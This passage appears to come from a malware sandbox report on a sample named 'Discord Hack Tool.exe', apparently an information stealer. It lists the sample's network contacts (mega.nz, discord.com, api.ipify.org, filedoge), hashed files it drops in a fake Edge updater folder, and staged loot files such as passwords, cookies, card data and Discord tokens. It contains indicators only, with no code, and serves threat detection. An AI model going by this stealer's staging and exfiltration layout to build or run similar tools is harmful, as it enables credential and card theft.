| CA | 162.208.16.18:443 | gfs302n108.userstorage.mega.co.nz | tcp |
| CA | 162.208.16.18:443 | gfs302n108.userstorage.mega.co.nz | tcp |
| FR | 185.206.26.18:443 | gfs208n108.userstorage.mega.co.nz | tcp |
| FR | 185.206.26.18:443 | gfs208n108.userstorage.mega.co.nz | tcp |
| FR | 185.206.26.18:443 | gfs208n108.userstorage.mega.co.nz | tcp |
| FR | 185.206.26.18:443 | gfs208n108.userstorage.mega.co.nz | tcp |
| LU | 89.44.168.102:443 | gfs270n386.userstorage.mega.co.nz | tcp |
| LU | 89.44.168.102:443 | gfs270n386.userstorage.mega.co.nz | tcp |
| LU | 89.44.168.102:443 | gfs270n386.userstorage.mega.co.nz | tcp |
| LU | 89.44.168.102:443 | gfs270n386.userstorage.mega.co.nz | tcp |
| NL | 185.206.24.26:443 | gfs204n118.userstorage.mega.co.nz | tcp |
| NL | 185.206.24.26:443 | gfs204n118.userstorage.mega.co.nz | tcp |
| NL | 185.206.24.26:443 | gfs204n118.userstorage.mega.co.nz | tcp |
| NL | 185.206.24.26:443 | gfs204n118.userstorage.mega.co.nz | tcp |
| DE | 94.24.36.10:443 | gfs262n300.userstorage.mega.co.nz | tcp |
| DE | 94.24.36.10:443 | gfs262n300.userstorage.mega.co.nz | tcp |
| DE | 94.24.36.10:443 | gfs262n300.userstorage.mega.co.nz | tcp |
| DE | 94.24.36.10:443 | gfs262n300.userstorage.mega.co.nz | tcp |
| ES | 185.206.27.18:443 | gfs214n108.userstorage.mega.co.nz | tcp |
| ES | 185.206.27.18:443 | gfs214n108.userstorage.mega.co.nz | tcp |
| ES | 185.206.27.18:443 | gfs214n108.userstorage.mega.co.nz | tcp |
| ES | 185.206.27.18:443 | gfs214n108.userstorage.mega.co.nz | tcp |
| GB | 104.86.110.114:443 | tcp | |
| GB | 92.123.128.147:443 | r.bing.com | tcp |
| GB | 92.123.128.147:443 | r.bing.com | tcp |
| GB | 92.123.128.147:443 | r.bing.com | tcp |
| GB | 92.123.128.147:443 | r.bing.com | tcp |
| GB | 92.123.128.147:443 | r.bing.com | tcp |
| GB | 92.123.128.147:443 | r.bing.com | tcp |
| GB | 92.123.128.177:443 | www.bing.com | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| N/A | 127.0.0.1:50165 | tcp | |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| DE | 49.13.193.134:443 | api.filedoge.com | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| GB | 2.23.210.75:80 | r11.o.lencr.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| N/A | 127.0.0.1:50299 | tcp | |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| N/A | 127.0.0.1:50322 | tcp | |
| N/A | 127.0.0.1:50338 | tcp | |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| N/A | 127.0.0.1:50358 | tcp | |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| N/A | 127.0.0.1:50409 | tcp | |
| N/A | 127.0.0.1:50435 | tcp | |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| N/A | 127.0.0.1:50466 | tcp | |
| N/A | 127.0.0.1:50486 | tcp | |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| N/A | 127.0.0.1:50506 | tcp | |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| N/A | 127.0.0.1:50526 | tcp | |
| N/A | 127.0.0.1:50546 | tcp | |
| N/A | 127.0.0.1:50566 | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | c03d23a8155753f5a936bd7195e475bc |
| SHA1 | cdf47f410a3ec000e84be83a3216b54331679d63 |
| SHA256 | 6f5f7996d9b0e131dc2fec84859b7a8597c11a67dd41bdb5a5ef21a46e1ae0ca |
| SHA512 | 6ea9a631b454d7e795ec6161e08dbe388699012dbbc9c8cfdf73175a0ecd51204d45cf28a6f1706c8d5f1780666d95e46e4bc27752da9a9d289304f1d97c2f41 |
\??\pipe\LOCAL\crashpad_5728_MPZHZISPTKOBXOGA
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 3d68c7edc2a288ee58e6629398bb9f7c |
| SHA1 | 6c1909dea9321c55cae38b8f16bd9d67822e2e51 |
| SHA256 | dfd733ed3cf4fb59f2041f82fdf676973783ffa75b9acca095609c7d4f73587b |
| SHA512 | 0eda66a07ec4cdb46b0f27d6c8cc157415d803af610b7430adac19547e121f380b9c6a2840f90fe49eaea9b48fa16079d93833c2bcf4b85e3c401d90d464ad2f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 10dc4966174406dddc5b7c9ab126e3d0 |
| SHA1 | dc56fcf80f1210d8c16a627d44b898b46cb0276d |
| SHA256 | 9d2eaf920bf43ae76a60b592fe1c43ce2a7227da81d7abacd5b911411697ff3c |
| SHA512 | 475aecd04693a7b092a249927a0d3af8546b3899178840ee7d0c274ffeef2a0a606b08961e9a54cc72415bc64baa459cb61449bd9cdd562480870c79fbbda13d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | dbd1aad6d652564c7830c6626f1b6080 |
| SHA1 | 8c9ccf14c3bfbd44d0b909be402335b4dbb352cd |
| SHA256 | 33a9ff3877f023b0e5da451618d626411d2074459664723a8300d3cb652cf8a9 |
| SHA512 | 741a0078ea13278ef824ff0cf3dbc29710b62d62e03f24c2fb56d012e70841dbc160adea67b59c42a8b166b328382a02f4762218d3caf8828f9894ff05e9a025 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | edf652416963e9d3d453d6ae71bd5392 |
| SHA1 | 1c7ec3b2337702982aa4b78c1540375b30872f87 |
| SHA256 | e219782a26857d10dd1bf8dab839bf450b9710d3c595c34b62e1e1d2ad3e2e30 |
| SHA512 | 53263046ff591f060ffbaf49171ed80e603b31ec51e27c46712587e662e97dd74413b7910e17b98bbb4ad94f5823f84c5ef71964a1a90bd00f47f21767d7c422 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 9557077999376925a9bb6588f8fd6a36 |
| SHA1 | ecac4387731e9cdb4abe3a4fc9f4239e2669f479 |
| SHA256 | 69a4ac05e9a73d7b8dd6b96940ae4b15fb3b29a22b0ee1076be3c8e36f204213 |
| SHA512 | 8a01cffc86e10d7e788943c517738db86dca67bba4ead7bf67d54ecc3e75bf3627be292e667a5681904ba44313ef6c21b5784cf93abd9b15077f71376b0f87e4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | 6b6e0bf89c9e3ca1d5c3f4619fed5d2c |
| SHA1 | 7754f5273776df71f3a0703242c4508c5c8ca644 |
| SHA256 | 3bb77cd2e8773a06cad6f954efa3da136ee8372dc83ca803ca91b120821a480e |
| SHA512 | 590e26c198884bd69e755349e84c7f2dd203b5c81564b417f7c3a1bc99cc0c6a8f3501be00985e34070e40cadaa0ce565a06e5ddaef354c1a266e5a65ea55f51 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe580470.TMP
| MD5 | 93f0328d107d88d63120c842f21c1510 |
| SHA1 | 920eee8930456daa717510b018197447ce241894 |
| SHA256 | b7b9533b58869da8a9d5dd9df133aa3273d3545336359cd6adc98844104b4262 |
| SHA512 | b50a174f702541eb2671d4f1fd99832fc047a66617d1b6d139f6541136de047f985a12d0133208bb1350f9a1d90333bd2754b5066bb8d238b3d697ae15398399 |
C:\Users\Admin\Downloads\Discord Hack Tool.exe
| MD5 | 7a89d2544714e445682d828b0f729b5f |
| SHA1 | 4c55c66ca16b17959a872d7179f0476f1622c9ec |
| SHA256 | 636f647539bf6dc083ae7a41b5e9cb19337046e2297c289760a104452d5a7255 |
| SHA512 | ce5d655254a7b605024cb3d3fa9a3ad2459174f4fe11d92637ccc3633ba7aeb3a471cb15d6d21dcda7c3fad5bc263c064fcbd9514c26fbd9a0d8c517036758d0 |
C:\Users\Admin\Downloads\Discord Hack Tool.exe:Zone.Identifier
| MD5 | fbccf14d504b7b2dbcb5a5bda75bd93b |
| SHA1 | d59fc84cdd5217c6cf74785703655f78da6b582b |
| SHA256 | eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913 |
| SHA512 | aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | c09ea00fed4bf0520c59cdba5e654e69 |
| SHA1 | ae8420c460678f8b8472207d21fb5cc961257ca7 |
| SHA256 | b16c51ad6922572aa76285a7eb85f9e87cc630a1edee0bd212d1df03e5a59f8e |
| SHA512 | 77067c62ce93bc4043f69543ba408094c8580236fe57d7b696fea139b6e490f4c81c5def873d507abed132983cbf6df9d47d732a872b3f3c2359052ff8c3de48 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\777e9ec9-7c93-4570-a59a-3af16089ec03.down_data
| MD5 | 5683c0028832cae4ef93ca39c8ac5029 |
| SHA1 | 248755e4e1db552e0b6f8651b04ca6d1b31a86fb |
| SHA256 | 855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e |
| SHA512 | aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3 |
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node
| MD5 | 66a65322c9d362a23cf3d3f7735d5430 |
| SHA1 | ed59f3e4b0b16b759b866ef7293d26a1512b952e |
| SHA256 | f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c |
| SHA512 | 0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21 |
C:\Users\Admin\Downloads\temp.ps1
| MD5 | 18047e197c6820559730d01035b2955a |
| SHA1 | 277179be54bba04c0863aebd496f53b129d47464 |
| SHA256 | 348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3 |
| SHA512 | 1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1jesll45.luv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5488-307-0x0000025B74290000-0x0000025B742B2000-memory.dmp
memory/5488-308-0x0000025B74330000-0x0000025B74376000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\lkpv3aqj\lkpv3aqj.cmdline
| MD5 | 38ed05083dcdf855ba993fc676307315 |
| SHA1 | 94994ce1619ba3a42d435fd2fb68e20551acdb74 |
| SHA256 | 381fad8c2f64c9cb68b761f0210140a0d0c5ed19242bd3a7d412d46546240925 |
| SHA512 | 87bd817186f14db7d851de2e262c8d1f8f5734a205a53dae1cafd3b5c3595c5a9a5b616c4a9289defacabd194354c7e5bcdf1a0c97a678d252300c7ff0ee6718 |
\??\c:\Users\Admin\AppData\Local\Temp\lkpv3aqj\lkpv3aqj.0.cs
| MD5 | 7bc8de6ac8041186ed68c07205656943 |
| SHA1 | 673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75 |
| SHA256 | 36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697 |
| SHA512 | 0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba |
\??\c:\Users\Admin\AppData\Local\Temp\lkpv3aqj\CSCFE21C5C5317A4A3B81B3616149D2A28F.TMP
| MD5 | 1256b9757e08db9a24ff8b1c3bde0bd9 |
| SHA1 | a26f125c0b7d7e94579a5a3ffa05e6febbcdd436 |
| SHA256 | e24a132e835a7972aab67fee93dd77197de84ca59dd35d43598f26f25b8f49da |
| SHA512 | df18bebb3a6bf88bf0f57a7ac419512505c04d7792937ff899cb979815248d4db7f459ba291ef63426a0cca17f5568a5ea688c5019259d55be85c6d0ecd6572b |
C:\Users\Admin\AppData\Local\Temp\RES5743.tmp
| MD5 | 24bf20c7da8cda980e104cecea6e811a |
| SHA1 | 895b1ca9530597ec5671231aa2c69411b1e1d215 |
| SHA256 | 46d6cc7946062bc84acc79c7a6473afe6d4c6a0eb1db34c68f37ed873540013e |
| SHA512 | e267f8d782358d776ab4dad6c31d6fcdc7b39681443b3bb6da63977e6a8b2936fb441c4e4113eb2f34037bb779e17bb39593cf24a48cfb9a8ae02f0bb6cdbd95 |
C:\Users\Admin\AppData\Local\Temp\lkpv3aqj\lkpv3aqj.dll
| MD5 | dc68c71403fb35455f2ec8757d03d299 |
| SHA1 | 3a14f8d4a0cefe2d3bfa9073ba7822dac2053c9d |
| SHA256 | 411bf004570ba42d74e01fc3d10aa79f095f5cdc6934b2f63082f56e0c70c679 |
| SHA512 | 2e520e5cb7584eff73c4e648dfb744f7dec3b31b40054c7470d4f310bb37553ba45fe33f954cfda0f16b4c6143e575477d44d25a005b8e18b8c14f0f2bdac680 |
memory/5488-321-0x0000025B74300000-0x0000025B74308000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 5f4c933102a824f41e258078e34165a7 |
| SHA1 | d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee |
| SHA256 | d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2 |
| SHA512 | a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034 |
memory/1004-336-0x000001C576CD0000-0x000001C576D20000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6cc0a34d75380a039c8a2d2821e13e86 |
| SHA1 | 3880cdef9421ad3ec32c463585fe3898ce9d5ade |
| SHA256 | 8942db45f7c5cf6be3abc9fe503a8bc485a720bb7a5838e6aebeb80f25f691d0 |
| SHA512 | eb91b7fb2b9c68078715b1512a2105f3d92123cef1cf2bb6e9fff63c714363c521b4cb840354f2d9f3792a088b9cc623b69514f48096e919a552837a21b47fb1 |
C:\Users\Admin\AppData\Local\Temp\a92ba44b56b77ce4f21f36ab78a2afeaEtZwIu\DisconnectBackup.docx
| MD5 | 9c3beaa0d2614d9e6cc74cd8aa3fc742 |
| SHA1 | 90f499d74fd2112409ef441bbd2da4950971d31e |
| SHA256 | e87b22799b18f247b0a89b49a120f4b22ee522458079c3cd0a898121acb14760 |
| SHA512 | 73a31e91034f46633aa9324bad7434962f88c890345f69a3032fa90327c35dbb706193e9d5e78f894ec7d08f2c798628ed2116f768b2949de1e53472d988d049 |
C:\Users\Admin\AppData\Local\Temp\a92ba44b56b77ce4f21f36ab78a2afeaEtZwIu\MeasureBackup.pdf
| MD5 | f2b1aed721fe827e3486af4471ed7d0a |
| SHA1 | 216876197d4da080eff1f842871f36235ea31c59 |
| SHA256 | fa096644e58f08983dc2a0f52852cbebcda052d74a7d2595c4531b0a4c86ffb3 |
| SHA512 | 52c426960baf3f7373f1c1a395476f13384ac577f24ec8e82bbf224342c54db3824a523e847d7e58eebbc34a0576499701b892e89c791b6029a02f55ea9f98cf |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log
| MD5 | 242305cfa742970f2f3c4708b0eaac45 |
| SHA1 | 33999ee6f04281ffb8cc33f7dc9fef0a4ae54c0a |
| SHA256 | f3f7ba96694df6b5309dadda3d9c8682d134fa2ec5713339f69602ee8dc6e59d |
| SHA512 | 5b58d8c3b95c61347dc23c144b648241e5896a88e31da04bf20f367f95ee81026eeb62e00cbefc75e46909b1d66273631537c93f8a6e9a3ef7c8d55955a0028f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 321d57fccee188820bd2d061279ef76b |
| SHA1 | 8c5c83ffe3579529e091b79333adf3e67b18077e |
| SHA256 | d2a97bdb5fddb22462e56382db24e2e01aff52cde524d55b7b7617a53c607709 |
| SHA512 | fd5b49c272dc22d5e2332ee6b0d5d88877ac96af3803a77e4b327d8884869fc68e1ed0a978660d149b85b19c5c09b39caba100db5087c4a50ce3820c7a66ffa5 |
C:\ProgramData\edge\Updater\Get-Clipboard.ps1
| MD5 | a8834c224450d76421d8e4a34b08691f |
| SHA1 | 73ed4011bc60ba616b7b81ff9c9cad82fb517c68 |
| SHA256 | 817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5 |
| SHA512 | 672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596 |
C:\ProgramData\edge\Updater\RunBatHidden.vbs
| MD5 | 14a9867ec0265ebf974e440fcd67d837 |
| SHA1 | ae0e43c2daf4c913f5db17f4d9197f34ab52e254 |
| SHA256 | cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1 |
| SHA512 | 36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54 |
C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat
| MD5 | 3dc18365d12c9d00b5e2ab37b05f4bf1 |
| SHA1 | 4b43f9f249bb7c00ca94f1d2d593882808d9f09d |
| SHA256 | 2469ae66e24a8d4b8196c511927400745cb05daf63eaf315390c6e7027ab9bc9 |
| SHA512 | 08e39debe9eed49343e5ef855197e0c3b62783a5ae27ab96343ae4b109af809fab356cb42051e1a9f4b1b205bb92ec0f03b9c77e7a765773ed4464cc263fe01e |
\??\c:\Users\Admin\AppData\Local\Temp\alkib1u5\alkib1u5.cmdline
| MD5 | 0e7c4010cfe49d314f8c16f50a9a5209 |
| SHA1 | 902709ff43d3ee8320f8981b232867cc5722400c |
| SHA256 | 2e5d4e70ee8df06be8bdb2c2e98bdd1c2aeed3d61f35ac6b75ec0225452d4599 |
| SHA512 | 5a07d6ed360f8a8fedefc6ab0e6ba3c8af3122c42acd6409dd24ea609b7d9244b2b34615eaaa10e98ce53d6106644edc7bbe73c1f6ad8797894b166ab582a5dc |
\??\c:\Users\Admin\AppData\Local\Temp\alkib1u5\alkib1u5.0.cs
| MD5 | b462a7b0998b386a2047c941506f7c1b |
| SHA1 | 61e8aa007164305a51fa2f1cebaf3f8e60a6a59f |
| SHA256 | a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35 |
| SHA512 | eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020 |
\??\c:\Users\Admin\AppData\Local\Temp\alkib1u5\CSC7E947611C34014BACF222DB2E44B9.TMP
| MD5 | 92a4dc443a97ad574316e0a549a0cf5f |
| SHA1 | ba852dff28a91bdc44db4a428988c6811c18928f |
| SHA256 | cb78bb0231033a90db4ce0211e7286ff88f1ae33e00d513ae867ff9a2d774621 |
| SHA512 | 3568587690b62f9c28d2308dfae93afdeead67fec686204be7a565e76c1effd8152a01c5933238a0b2d7bd7f3324a924507d42eeeb4d5ccb329c1012df726e74 |
C:\Users\Admin\AppData\Local\Temp\RES5EE4.tmp
| MD5 | 1100d83892f4910633efc703fbc81bfe |
| SHA1 | 21211280d3d4bf8010ccad600d837be03e48a014 |
| SHA256 | 539556057c52dd182667f3eea7ac6f3a231d1a1dba1e1d10c231133d10a651ab |
| SHA512 | e144ad975a43bb78af033cf8de8afbf2c4a346eab5db083c9cf2a52fc564b375bddc5759a1f700c5379149c79ba94237f66b87d6ae2766820c16d7e0cd8bf5f6 |
C:\Users\Admin\AppData\Local\Temp\alkib1u5\alkib1u5.dll
| MD5 | b833658801fbad7f04e700d2545bf541 |
| SHA1 | e6a51620d1eb0242f256ff0a3096cda045f5b232 |
| SHA256 | 4bfd6bf062139a5ce455aee439fca2a7fca7779379445552e59b87a4d330dd05 |
| SHA512 | e3131cc17c57f9e653bba92a0e9beccfb9719858fd0ed1c6709014b0b3eafa397c7d561e58e1d7d9df7f2e217ad4b36629c6f0e1f7c8c69cd29fc01bf46a8696 |
memory/676-424-0x00000263AC350000-0x00000263AC358000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 39669e209b0ec52df5c516d4112178e9 |
| SHA1 | 006ef55f6f5912a60a823776fb2d3476f5df4986 |
| SHA256 | b3b27bee0c324a6a84ecef0fe783eb73f9091528c6abffa6f3f836b4464856b1 |
| SHA512 | 2809f7f640088cdce83c1c54dfad4eae9e635b9c3feb8467bd7e5ee20da3b0d02d9f90c0c79f1d2a6e7752e582a2e0c46bc2646ab87d547e8ccbc420341a8920 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4093e5ab3812960039eba1a814c2ffb0 |
| SHA1 | b5e4a98a80be72fccd3cc910e93113d2febef298 |
| SHA256 | c0794e2b7036ce5612446a8b15e0c8387773bbc921f63cf8849f8a1f4ef3878c |
| SHA512 | f3555b45aa1a1dd5214716dc81a05905c4ecd5a3e1276d35e08c65623ab1d14d469b3b576a5d9638264c1222d73889d2cc1ee43fb579d9ca3fcddd9f557cac7b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d5ed044e4f1e21179db39ad1fb6ca742 |
| SHA1 | 3676af58ce6e48caa088d36a7837924f82a71d6e |
| SHA256 | e89e1b210c5f2851508e7dba182fc4be83655b67197200f413fdbe21be0ab951 |
| SHA512 | 97f9c523b46ec6dd02c20dd99c9313976f3b000231ceca724acf96be0f9075da0b72c91d415ee7e54118dca03c7bf0b97d986299656baa037a519ab7ad06df07 |
C:\ProgramData\Steam\Launcher\EN-Aoyvszio\Cards\Cards.txt
| MD5 | 8a0ed121ee275936bf62b33f840db290 |
| SHA1 | 898770c85b05670ab1450a96ea6fbd46e6310ef6 |
| SHA256 | 983f823e85d9e4e6849a1ed58e5e3464f3a4adbe9d0daeeadd1416cf35178709 |
| SHA512 | 7d429ce5c04a2e049cdf3f8d8165a989ab7e3e0ac25a7809c12c4168076492b797d2eebaf271ae02c51cb69786c2574ec3125166444e4fa6fc73430f75f8f154 |
C:\ProgramData\Steam\Launcher\EN-Aoyvszio\Autofills\Autofills.txt
| MD5 | 2f308e49fe62fbc51aa7a9b987a630fe |
| SHA1 | 1b9277da78babd9c5e248b66ba6ab16c77b97d0b |
| SHA256 | d46a44dd86cea9187e6049fd56bb3b450c913756256b76b5253be9c3b043c521 |
| SHA512 | c3065baa302032012081480005f6871be27f26da758dc3b6e829ea8a3458e5c0a4740e408678f3ecf4600279d3fcad796f62f35b8591e46200ce896899573024 |
C:\ProgramData\Steam\Launcher\EN-Aoyvszio\Cookies\Google_Default.txt
| MD5 | 31f1018f819e256b1f5f0ba7f79b01aa |
| SHA1 | 50a1347671e5d4d0a8e0b0b178b7b3f9fec82fc7 |
| SHA256 | fddf657f6d965c785b36ab884411b6962b1666d81f4498ee4e669200527f4e9b |
| SHA512 | 59b3851872e5a1927981b06df676ddeca96b790aed7fc91df4a96e31124efd39c714141fe171406a682fcdaf98f427fc6fdc5e6e61a2844359e4c9246d9e2666 |
C:\ProgramData\Steam\Launcher\EN-Aoyvszio\stolen_files.zip
| MD5 | 86d0930e16b26906bf16e067615cbf4b |
| SHA1 | 0a31e8db6f2f8890d02ef24407abd8d1f28bdae6 |
| SHA256 | 411a3bb92266ca00919c0e0346ac1e560723cee3fab2a78b0b9bf532bb0b1752 |
| SHA512 | cfc0bf6a1036d9a2770a418e8d81ae4ea13b6f4efdf8c9d86b79f5e91dec5b8d60dc6fc32edfef9fdfd8d121d5216362302733d013af919f8e1b6281c1901ff0 |
C:\ProgramData\Steam\Launcher\EN-Aoyvszio\Serial-Check.txt
| MD5 | b9874175566620121d427b868e7e8b53 |
| SHA1 | 5b2086713a50b8de472a5f5d4dd8da6e7fe00291 |
| SHA256 | e3017d6c964d9f70232b99c31335286159a82f2d270ffe45f46c72ca457c633b |
| SHA512 | 56028c278c867794390f6ae2c8361f376c6b3bd4a206d3e12ca61cdbb90781e9b4d7d63986a537f62ce7ee8bffe8fe53edd2aec7e7b44770e43b0202a9c99435 |
C:\ProgramData\Steam\Launcher\EN-Aoyvszio\Passwords\Passwords.txt
| MD5 | c5e74f3120dbbd446a527e785dfe6d66 |
| SHA1 | 11997c2a53d19fd20916e49411c7a61bfb590e9c |
| SHA256 | e0fd13d912d320faaa64e177b4e75f54ec140692ebc5904d10e1cbe3e811ee05 |
| SHA512 | a2bab776d22abf857c7df84b3c90851829eda615fbd450c9c72ab89f97591224380990a86c8e7e40ac811aa1225592743eebed63125d519d138fa28b859f2a3f |
C:\ProgramData\Steam\Launcher\EN-Aoyvszio\Discord\discord.txt
| MD5 | 675951f6d9d75fd2c9c06b5ff547c6fd |
| SHA1 | 9b474ab39d1e2aad52ea5272dbac7d4f9fe44c09 |
| SHA256 | 60fe7843b40ed5b7c68118bbba6bfe5f786a76397cdedb80612fd7cefce7f244 |
| SHA512 | 44dfb6c937283870c6eedf724649004a82631cd8eeb3f9c83e5bca619d1c9ffb8aa5f51c91d57f76789e2747712ce9c6ad207773928e5e00e712f640f8c25aea |
C:\ProgramData\Steam\Launcher\EN-Aoyvszio\debug.log
| MD5 | 425a0aa96a983ab490c8196389547158 |
| SHA1 | ad3879364ea013676b9b0f44db62c627fe5ad34c |
| SHA256 | 29350a26de3566a3f4419b6dd514df85517a866548088ad40802f865abac5944 |
| SHA512 | 6d501174e4ef722c76fe8807487e0b6c7891fc2b2495297a43707f9e65c189a70e8f0153acf493a999616b208a73192d6bd7c73b1eee4f6f9f9191bc592b04ba |
C:\ProgramData\Steam\Launcher\EN-Aoyvszio.zip
| MD5 | ab5f50cf9d53729e59567270f44c973a |
| SHA1 | 1fcbbb085eebb323ff5f18a6e936c12079b4fe78 |
